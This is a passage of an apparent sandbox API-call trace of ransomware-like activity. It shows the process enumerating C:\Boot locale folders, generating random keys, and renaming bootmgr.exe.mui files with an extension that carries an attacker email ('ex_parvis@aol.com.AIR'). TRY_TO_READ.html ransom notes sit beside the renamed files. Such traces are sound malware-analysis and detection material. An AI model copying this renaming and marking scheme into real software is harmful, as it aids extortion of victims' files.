lpString1="C:\\\\Boot\\it-IT\\bootmgr.exe.mui") returned="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" [0116.611] lstrcatW (in: lpString1="C:\\\\Boot\\it-IT\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.611] MoveFileExW (lpExistingFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.611] CreateFileW (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.611] GetProcessHeap () returned 0x2e0000 [0116.611] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.611] CloseHandle (hObject=0xffffffff) returned 0 [0116.611] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.611] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.611] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.611] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.611] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e3c8 | out: hHeap=0x2e0000) returned 1 [0116.611] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e3f0 | out: hHeap=0x2e0000) returned 1 [0116.611] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ja-JP\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35d958 [0116.611] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.612] GetLastError () returned 0x6 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e3c8 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d998 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d998 | out: hHeap=0x2e0000) returned 1 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e3c8 | out: hHeap=0x2e0000) returned 1 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.612] FindNextFileW (in: hFindFile=0x35d958, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fe19d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.612] GetLastError () returned 0x6 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e3c8 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d998 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d998 | out: hHeap=0x2e0000) returned 1 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e3c8 | out: hHeap=0x2e0000) returned 1 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.612] FindNextFileW (in: hFindFile=0x35d958, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.612] GetLastError () returned 0x6 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e3c8 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.612] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.612] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.613] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.613] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e3c8 | out: hHeap=0x2e0000) returned 1 [0116.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.613] FindNextFileW (in: hFindFile=0x35d958, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fe19d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.613] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.613] GetLastError () returned 0x6 [0116.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.613] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.613] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.613] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.613] FindNextFileW (in: hFindFile=0x35d958, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fe19d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96fe19d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3625b0 [0116.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330b68 [0116.613] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3625b0 | out: pbBuffer=0x3625b0) returned 1 [0116.613] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330b68 | out: pbBuffer=0x330b68) returned 1 [0116.613] SetFileAttributesW (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.613] lstrlenW (lpString="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui") returned 30 [0116.613] GetProcessHeap () returned 0x2e0000 [0116.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.613] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui") returned="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" [0116.613] lstrcatW (in: lpString1="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.613] MoveFileExW (lpExistingFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.613] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.614] GetProcessHeap () returned 0x2e0000 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.614] CloseHandle (hObject=0xffffffff) returned 0 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e418 | out: hHeap=0x2e0000) returned 1 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e440 | out: hHeap=0x2e0000) returned 1 [0116.614] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ko-KR\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35d998 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.614] GetLastError () returned 0x6 [0116.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e418 [0116.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d9d8 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d9d8 | out: hHeap=0x2e0000) returned 1 [0116.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e418 | out: hHeap=0x2e0000) returned 1 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.614] FindNextFileW (in: hFindFile=0x35d998, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.614] GetLastError () returned 0x6 [0116.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e418 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d9d8 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d9d8 | out: hHeap=0x2e0000) returned 1 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e418 | out: hHeap=0x2e0000) returned 1 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.615] FindNextFileW (in: hFindFile=0x35d998, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.615] GetLastError () returned 0x6 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e418 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e418 | out: hHeap=0x2e0000) returned 1 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.615] FindNextFileW (in: hFindFile=0x35d998, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97007b30, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.615] GetLastError () returned 0x6 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.615] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.615] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.616] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.616] FindNextFileW (in: hFindFile=0x35d998, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97007b30, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.616] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.616] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3626b8 [0116.616] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330b78 [0116.616] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3626b8 | out: pbBuffer=0x3626b8) returned 1 [0116.616] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330b78 | out: pbBuffer=0x330b78) returned 1 [0116.616] SetFileAttributesW (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.616] lstrlenW (lpString="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui") returned 30 [0116.616] GetProcessHeap () returned 0x2e0000 [0116.616] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.616] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui") returned="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" [0116.616] lstrcatW (in: lpString1="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.616] MoveFileExW (lpExistingFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.616] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.616] GetProcessHeap () returned 0x2e0000 [0116.616] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.616] CloseHandle (hObject=0xffffffff) returned 0 [0116.616] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.616] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.616] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.616] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.616] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e468 | out: hHeap=0x2e0000) returned 1 [0116.616] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e490 | out: hHeap=0x2e0000) returned 1 [0116.616] FindFirstFileW (in: lpFileName="C:\\\\Boot\\nb-NO\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35d9d8 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.617] GetLastError () returned 0x6 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e468 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35da18 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35da18 | out: hHeap=0x2e0000) returned 1 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e468 | out: hHeap=0x2e0000) returned 1 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.617] FindNextFileW (in: hFindFile=0x35d9d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97007b30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97007b30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.617] GetLastError () returned 0x6 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.617] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.617] 